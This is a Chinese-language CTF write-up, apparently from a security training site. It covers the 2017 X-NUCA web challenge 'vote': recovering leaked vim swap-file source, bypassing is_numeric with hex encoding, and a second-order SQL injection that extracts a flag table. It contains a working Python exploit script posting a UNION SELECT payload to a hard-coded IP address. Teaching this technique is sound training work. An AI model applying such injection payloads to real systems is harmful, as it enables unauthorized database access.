X-NUCAweb专题赛--vote的解题思路

发表于:2017-08-23 15:10:00 来源:  合天网安实验室 阅读数(0人)

先看题:



可注入,然而,那到底能不能注入啊?



选电影么?

扫网站,.index.php.swp源码泄露

用vim 还原源码

经过观察可以控制的字段有id

所以id是注入点

注入点id是被is_numeric过滤后,插入到vote表里的,可以用十六进制或者二进制绕过is_numeric,把注入查询语句插入到vote表里,然后又从vote表里取出,形成二次注入猜解t_flag表,使用GROUP_CONCAT(flag)取flag解题代码:

#!/usr/bin/env python

import requests

import binascii

import sys

def hack(inject):

#print inject;

vul={'id':inject,'vote':3,'submit':1}

print vul

req=requests.post('http://218.76.35.74:65080/index.php',data=vul)

print req.content

if __name__=="__main__":

s = '-1 union all (SELECT GROUP_CONCAT(flag) from t_flag)'

hack("0x" + binascii.hexlify(s))

相关新闻

大家都在学

课程详情

CTF-WEB小技俩

课程详情

密码学原理

课程详情

办公网络安全